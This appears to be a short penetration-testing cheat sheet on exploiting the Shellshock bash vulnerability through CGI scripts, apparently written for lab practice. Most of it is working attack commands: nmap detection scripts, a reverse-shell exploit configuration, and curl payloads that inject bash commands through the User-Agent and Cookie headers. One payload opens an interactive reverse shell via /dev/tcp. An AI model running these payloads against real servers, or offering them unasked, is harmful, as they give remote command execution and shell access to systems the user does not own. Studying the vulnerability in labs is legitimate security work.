Table of content


Iterate the cgi-bin directory agains *.sh, *.pl, *.cgi and *.py.

When one script is found, use the nmap http-shellshock script:

nmap -sV -p- --script http-shellshock <target>
nmap -sV -p- --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls <target>

If vulnerable, it is possible to exploit it :

# payload=reverse rhost= lhost=<LAB IP> lport=<port> pages=/cgi-bin/

Or manually through curl:

# Reflected
curl -H 'User-Agent: () { :; }; echo "VULNERABLE TO SHELLSHOCK"' 2>/dev/null| grep 'VULNERABLE'

# Blind with sleep (you could also make a ping or web request to yourself and monitor that oth tcpdump)
curl -H 'User-Agent: () { :; }; /bin/bash -c "sleep 5"'

# Out-Of-Band Use Cookie as alternative to User-Agent
curl -H 'Cookie: () { :;}; /bin/bash -i >& /dev/tcp/ 0>&1'

results matching ""

    No results matching ""

    results matching ""

      No results matching ""